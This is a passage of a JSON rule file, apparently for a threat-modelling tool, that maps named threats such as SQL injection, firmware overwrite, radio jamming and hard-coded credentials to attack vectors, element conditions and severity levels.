exploited","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"5605adab-044a-4b1f-9344-90a602d8d448","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","70d07015-4eda-4d1a-8d07-1791f881f8f0"]},"RuleType":1,"StencilRestriction":{"stencilTypeID":"cf7355d0-6f0c-4ad8-afa2-8689a81e28b8","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"e8430761-3c2e-4db0-adbd-5310214574c2","ComparisonType":"==","Value":false}}]},"overridenRuleIDs":[],"Severity":3},{"ID":"7cfa63f6-262b-4da3-aa88-6478522b45c5","Name":"Firmware Overwrite","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"01a37617-b7ac-446a-86fa-e70c957d154c","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596","f2ba26f4-b2da-49a8-aba2-14e42a746d6a"]},"RuleType":1,"StencilRestriction":{"stencilTypeID":"cf7355d0-6f0c-4ad8-afa2-8689a81e28b8","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"e8430761-3c2e-4db0-adbd-5310214574c2","ComparisonType":"==","Value":false}}]},"overridenRuleIDs":[],"Severity":4},{"ID":"5c21d6b7-2390-4f72-b29e-7d7985a30293","Name":"Improper Isolation","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"d4292863-c64e-4123-806f-71590ec76ed3","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"]},"RuleType":1,"StencilRestriction":{"stencilTypeID":"8bd42f0c-a4d2-4d98-9dcb-b9b100114fa5","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"HasTrustedExecutionEnvironment","ComparisonType":"==","Value":true}}]},"overridenRuleIDs":[],"Severity":2},{"ID":"7b825bd7-222e-476f-bf22-85fe2e50eb6c","Name":"DoS attack from Internet","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"8f9a24d4-e962-4136-b0ec-8e9f797a6f62","ThreatCategoryIDs":["b869918c-0b47-45c3-8fab-0b698043aa66"]},"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":[]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":["b76ebd30-234d-4704-bf27-ab3e0bf5ae97"]},"SenderInterfaceRestriction":{"Property":{"ID":"","ComparisonType":"==","Value":null}}}]},"overridenRuleIDs":[],"Severity":2},{"ID":"13b5172b-9d6c-49a3-9580-fb256d5cd506","Name":"Decommissioned data store","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"327a2f35-8cf5-46d5-a973-a174f6f7be23","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596","11a5c06f-875c-43fa-a01f-79f4819f98dd"]},"RuleType":1,"StencilRestriction":{"stencilTypeID":"80aa0465-21e0-41bd-b521-84a346c5f54b","DetailRestrictions":[{"IsOR":false,"Layer":0,"RestType":1,"PropertyRest":{"ID":"IsEncrypted","ComparisonType":"==","Value":false}},{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"IsVolatile","ComparisonType":"==","Value":false}}]},"overridenRuleIDs":[],"Severity":3},{"ID":"ddfef636-378c-4874-b2ea-33b0fcfe22c5","Name":"Access data exposure","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"7dc1eb8e-2312-4b2f-becf-f9725d45cdce","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"]},"RuleType":1,"StencilRestriction":{"stencilTypeID":"367702af-ceba-459b-84e5-27efe918968e","DetailRestrictions":[]},"overridenRuleIDs":["358f4f37-445a-4336-8107-c02d7b9cd3a4"],"Severity":4},{"ID":"32d4322f-482d-4a59-8f62-964ef8014a0b","Name":"Radio jamming","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"23c3a785-a539-4570-aee0-42bdffb43983","ThreatCategoryIDs":["b869918c-0b47-45c3-8fab-0b698043aa66"]},"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":[]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":true,"RestType":10,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"SenderInterfaceRestriction":{"Property":{"ID":"IsWireless","Value":true}}},{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":11,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"ReceiverInterfaceRestriction":{"Property":{"ID":"IsWireless","ComparisonType":"==","Value":true}}}]},"overridenRuleIDs":[],"Severity":3},{"ID":"b3450129-f094-4d50-bc87-efb4e8e84a12","Name":"Bad certificate","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"0b47795b-b42d-49d1-bf50-7f4889994fea","ThreatCategoryIDs":["8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"]},"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":[]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ProvidesReceiverAuthenticity","ComparisonType":"==","Value":true}}]},"overridenRuleIDs":[],"Severity":3},{"ID":"4611ab6f-adbf-47f3-86ff-8af0ac645d80","Name":"Improper user input validation","Description":"Verify that all input is verified for correctness using an approved list input validation approach.","IsActive":true,"RuleGenerationType":3,"Mapping":{"AttackVectorID":"d92ccd9c-3a24-4e07-a2ca-c1e9949bb386","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","b869918c-0b47-45c3-8fab-0b698043aa66","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"]},"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":["02b39924-b8f2-44da-a2bc-be1bd2450f68","03e3750c-8549-4589-8269-e0121b3f26a4"]},{"TypeIDs":[]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":0,"IsOR":true,"RestType":1,"PropertyRest":{"ID":"7632a126-216a-4463-83ef-6ce82331d9f8","ComparisonType":"==","Value":true}},{"Layer":0,"NodeNumber":0,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"18571d26-3d51-45b8-96f0-ff6e273e70c6","ComparisonType":"==","Value":true}}]},"overridenRuleIDs":[],"Severity":3},{"ID":"32dab43f-2dc8-4109-9420-ee7c118a82d5","Name":"Limitation of the charging power","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"ThreatCategoryIDs":["f2ba26f4-b2da-49a8-aba2-14e42a746d6a"]},"RuleType":1,"StencilRestriction":{"stencilTypeID":"5f755466-4417-4060-83de-64bddeabd1ba","DetailRestrictions":[]},"overridenRuleIDs":[],"Severity":2},{"ID":"4609cf84-96fa-4054-bf45-5b33993ce648","Name":"Blocking battery charging","Description":"For example, https://www.brokenwire.fail/","IsActive":true,"RuleGenerationType":2,"Mapping":{"ThreatCategoryIDs":["f2ba26f4-b2da-49a8-aba2-14e42a746d6a"]},"RuleType":1,"StencilRestriction":{"stencilTypeID":"5f755466-4417-4060-83de-64bddeabd1ba","DetailRestrictions":[]},"overridenRuleIDs":[],"Severity":2},{"ID":"1d39d1b0-8f3c-40f7-bb6d-f7699b3b4b07","Name":"Overcharging","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"ThreatCategoryIDs":["f2ba26f4-b2da-49a8-aba2-14e42a746d6a","17a04fbd-365f-4345-97f8-88d3c7382ec1"]},"RuleType":1,"StencilRestriction":{"stencilTypeID":"5f755466-4417-4060-83de-64bddeabd1ba","DetailRestrictions":[]},"overridenRuleIDs":[],"Severity":3},{"ID":"358f4f37-445a-4336-8107-c02d7b9cd3a4","Name":"Cleartext data storage","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"ef144ae1-4c70-400e-8222-b8a7dd3bf3e9","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"RuleType":1,"StencilRestriction":{"stencilTypeID":"c7598413-4382-43e9-9904-fd9d877eb7a9","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"ContainsSensitiveData","ComparisonType":"==","Value":true}},{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"ProcessedDataSensitivity","ComparisonType":">=","Value":2}}]},"overridenRuleIDs":[],"Severity":3},{"ID":"2759171a-24e3-4bfe-8ca7-5814902a000e","Name":"Cleartext storage on unencrypted physical storage","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"e851a284-6b41-41c9-9efd-dc8b01f788da","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"c7598413-4382-43e9-9904-fd9d877eb7a9","DetailRestrictions":[{"IsOR":false,"Layer":0,"RestType":3,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"PhyElementRest":{"Property":{"ID":"IsEncrypted","ComparisonType":"==","Value":false}}},{"IsOR":true,"Layer":0,"RestType":3,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"PhyElementRest":{"Property":{"ID":"IsMultipleWritable","ComparisonType":"==","Value":true}}}]},"Severity":3},{"ID":"8b527d06-5d08-41c1-91fc-1c4146858987","Name":"Missing encryption","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"bb7358c1-e5b6-424f-962d-daab17345b63","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","8a3d81d9-3317-4e5d-88fe-a0e0592295fe"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":true,"Target":-1,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","02b39924-b8f2-44da-a2bc-be1bd2450f68","04be7cf6-00dd-4aa8-b90b-e9bf105e39e7"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","02b39924-b8f2-44da-a2bc-be1bd2450f68","04be7cf6-00dd-4aa8-b90b-e9bf105e39e7"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ProvidesConfidentiality","ComparisonType":"==","Value":false}},{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]},"Severity":3},{"ID":"da0924b8-967c-406e-a2f5-a6ebac21de1d","Name":"Missing integrity check","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"001ba17c-0400-4369-912e-0ceda3ccd227","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":true,"Target":-1,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","02b39924-b8f2-44da-a2bc-be1bd2450f68","04be7cf6-00dd-4aa8-b90b-e9bf105e39e7"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","02b39924-b8f2-44da-a2bc-be1bd2450f68","04be7cf6-00dd-4aa8-b90b-e9bf105e39e7"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ProvidesIntegrity","ComparisonType":"==","Value":false}},{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]},"Severity":2},{"ID":"3084a3b9-fdba-4bb1-97fa-c59ddbea7d22","Name":"SQL Injection","Description":"SQL injection is an attack in which malicious code is inserted into strings that are later passed to an instance of SQL Server for parsing and execution. Any procedure that constructs SQL statements should be reviewed for injection vulnerabilities because SQL Server will execute all syntactically valid queries that it receives. Even parameterized data can be manipulated by a skilled and determined attacker.","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"1a511f9e-5d1b-47b9-9071-4d39407cc75c","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":["74245351-b923-4cd6-b9e7-fe9f9916cbf5"]}],"NodeRestrictions":[]},"Severity":3},{"ID":"4c58a730-0161-4385-8249-bbf603ae1b88","Name":"Plaintext password","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"f0ef09ed-0cde-4b12-beb6-f1640132f3e6","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","4f5e6bf4-c9c4-4ea6-9b0e-5c861570e6ec","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"367702af-ceba-459b-84e5-27efe918968e","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"ea6098a1-cc93-4f7d-a6c6-e9ec84e8c393","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"af1cd836-48c2-437c-93d0-58b7c9e1d0f6","Name":"Password hash w/o salt","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"0e3c0e3e-1587-46f8-93ea-e9091dff5958","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"367702af-ceba-459b-84e5-27efe918968e","DetailRestrictions":[{"IsOR":false,"Layer":0,"RestType":1,"PropertyRest":{"ID":"452b2b74-1eb6-4edb-8921-274b2332c7bf","ComparisonType":"==","Value":false}},{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"ea6098a1-cc93-4f7d-a6c6-e9ec84e8c393","ComparisonType":"==","Value":true}}]},"Severity":2},{"ID":"09881484-9a79-427d-a638-3e894af45c13","Name":"Missing authentication","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"d46f6e31-ae41-4d6e-93fc-0e6c3bbb295d","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"4e797b3d-fcdd-43ce-953e-8d5af2c47d91","DetailRestrictions":[{"IsOR":false,"Layer":0,"RestType":1,"PropertyRest":{"ID":"db9caa64-fec1-47e8-9ed8-97896030cc90","ComparisonType":"==","Value":true}},{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"a5bb6218-f4e3-445f-95b3-1fc0be602d36","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"5c467e46-e642-49ad-a057-4784ec792125","Name":"Malicious code implanted","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"be14adbc-19a7-48c8-8f13-2566559e63e2","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","f2ba26f4-b2da-49a8-aba2-14e42a746d6a"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"80aa0465-21e0-41bd-b521-84a346c5f54b","DetailRestrictions":[{"IsOR":false,"Layer":0,"RestType":1,"PropertyRest":{"ID":"IsEncrypted","ComparisonType":"==","Value":false}},{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"IsMultipleWritable","ComparisonType":"==","Value":true}}]},"Severity":2},{"ID":"2af47360-11c3-45e3-a43f-fc3efa8f6f4d","Name":"Reverse engineering","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"f6ddb913-05ab-485a-a736-46a3f7466f85","ThreatCategoryIDs":["a6a57921-7fcb-4f54-b0f5-bac0a0f74163","ddf75d3c-ac5a-4ca2-8268-a4f7b40add7d"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"a051ae84-5f0a-4f8e-a468-2d309cd7223f","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"IsCustomDesign","ComparisonType":"==","Value":true}}]},"Severity":2},{"ID":"53fc96a4-96a0-42cc-bb2a-fc4515b8b008","Name":"PCB oversupply","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"90a4e8f3-c750-47c4-97fd-fa9e25b9b599","ThreatCategoryIDs":["a6a57921-7fcb-4f54-b0f5-bac0a0f74163","ddf75d3c-ac5a-4ca2-8268-a4f7b40add7d"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"a051ae84-5f0a-4f8e-a468-2d309cd7223f","DetailRestrictions":[{"IsOR":false,"Layer":0,"RestType":1,"PropertyRest":{"ID":"IsIn-HouseProduced","ComparisonType":"==","Value":false}},{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"IsReplaceable","ComparisonType":"==","Value":true}}]},"Severity":2},{"ID":"9846541d-9bf3-4a2e-98cb-1ad13da5648b","Name":"Malicious peripheral","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"21c6b5ef-82c7-41e5-bb07-de93445b2156","ThreatCategoryIDs":["c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"a051ae84-5f0a-4f8e-a468-2d309cd7223f","DetailRestrictions":[]},"Severity":3},{"ID":"1da12d13-b7ea-4179-8c6b-b87a338d95a5","Name":"Provisioning data cloning","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"a912b48a-3b4d-44ab-b8f3-28000ca945c4","ThreatCategoryIDs":[]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"a051ae84-5f0a-4f8e-a468-2d309cd7223f","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"IsIn-HouseProduced","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"63fb20c8-4a32-430e-bfa4-587503eaf572","Name":"Chip oversupply","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"90a4e8f3-c750-47c4-97fd-fa9e25b9b599","ThreatCategoryIDs":["a6a57921-7fcb-4f54-b0f5-bac0a0f74163","ddf75d3c-ac5a-4ca2-8268-a4f7b40add7d"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"6065e8dd-23c0-4dc9-ad51-628af88f3309","DetailRestrictions":[{"IsOR":false,"Layer":0,"RestType":1,"PropertyRest":{"ID":"IsCustomDesign","ComparisonType":"==","Value":true}},{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"IsIn-HouseProduced","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"d0736981-7141-4d93-b493-d99135b8d236","Name":"Permissive status display","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"9538abd8-f79c-4097-b2dd-716e50a125ee","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"6b505c9a-c505-4305-8c07-a3cde1c1ddfc","DetailRestrictions":[]},"Severity":2},{"ID":"2b24dfec-f29a-4682-8066-db29831234ec","Name":"Missing password field masking","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"b9436449-7896-4be6-89f8-a19e1c8d014f","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"6b505c9a-c505-4305-8c07-a3cde1c1ddfc","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"04fc735e-8da5-409d-93c9-5d56eb0a852d","ComparisonType":"==","Value":true}}]},"Severity":2},{"ID":"e3a2c92b-834f-408e-a4d2-87cfc66bd9fc","Name":"Password hash w/ predictable salt","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"05e04798-41ce-4919-a92b-264f7e985de2","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"367702af-ceba-459b-84e5-27efe918968e","DetailRestrictions":[{"IsOR":false,"Layer":0,"RestType":1,"PropertyRest":{"ID":"ea6098a1-cc93-4f7d-a6c6-e9ec84e8c393","ComparisonType":"==","Value":true}},{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"452b2b74-1eb6-4edb-8921-274b2332c7bf","ComparisonType":"==","Value":true}}]},"Severity":1},{"ID":"834aa7e3-1a0b-47a8-abdc-b4b1a6705377","Name":"IC reverse engineering","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"e6c3d6f5-f4c7-48b7-b516-2092c3557c81","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596","ddf75d3c-ac5a-4ca2-8268-a4f7b40add7d"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"e8430761-3c2e-4db0-adbd-5310214574c2","DetailRestrictions":[]},"Severity":2},{"ID":"78a3949d-8677-4426-b2b1-eb20b4296821","Name":"Draining attack","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"1447713d-9ad6-454e-81d8-c9f4ef34c72b","ThreatCategoryIDs":["9e715340-1a69-47df-864a-7c3b5a9a678e","b869918c-0b47-45c3-8fab-0b698043aa66","08d8fbba-5de4-4538-8674-43e214c3ebad","f2ba26f4-b2da-49a8-aba2-14e42a746d6a"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"1dc32bac-147f-42a4-a13c-44e5b59f7b81","DetailRestrictions":[]},"Severity":2},{"ID":"8ab20d5d-f624-46f5-beeb-833327d8673f","Name":"Hard-coded credentials","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"723dfb40-4ceb-4232-bda5-73bcb3c76ac0","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"e1e92ae3-ee61-4cae-bfb5-be18e97ea587","ComparisonType":"==","Value":true}}]},"Severity":4},{"ID":"34b65a9d-ca44-44b0-b66f-aa5bacfc53b4","Name":"Default password","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"5e7fd04c-0e14-4c76-800d-f581bcf7c7f6","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"714ed1de-855c-491b-8a08-745a99e17413","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"67919611-8ec3-4d48-bbd7-03f963d6f12c","Name":"Password requirements","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"5435aa9a-ad52-470f-8fa5-81a4f926b6a6","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"540e39da-3227-4e6c-86ea-32a017318511","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"5585cf20-9e87-4ae5-960a-a952b07c37e5","Name":"Single-factor authentication","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"63dfaefa-c8a8-4725-b6d6-2efff7306639","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"88763e20-7878-4525-81d8-c4d09b867042","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"b3a678a2-87a5-42ae-a1ef-4ec599554471","Name":"Restriction of attempts","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"296e95fe-e06d-4ae3-be84-da98df4a122c","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"aa74f499-b995-4f5e-8d92-91f3ca172743","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"61452452-9fdc-4023-873d-93cd6d018abb","Name":"Session ID expiration","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"bf289171-82c3-431a-b3f1-28d17e5a6546","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"51473250-3891-4342-a8b8-687db16ffef3","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"dde91006-ebc4-4e9c-906b-8c3591266097","Name":"Session timeout","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"bf289171-82c3-431a-b3f1-28d17e5a6546","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"a21a6894-256f-4bfd-bd49-09352d054399","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"a100a6c5-5f38-4224-a74a-825fa89579c2","Name":"Password recovery","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"2f483201-0209-4320-ba2e-2d692274aab5","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"a9b6390d-0145-4e0f-8420-8a9b8f728c3d","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"96876c2e-a3e9-4e0f-afd0-fe721dd0f295","Name":"Client-side hashing","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"4ee3fc8a-87a5-4fdf-868f-fb35cd12dc91","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"ba8dc5f0-e1a9-4263-8179-747791b873ee","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"2b389d13-5f71-4bb4-b111-a7fee2b6a486","Name":"Restriction to hardware 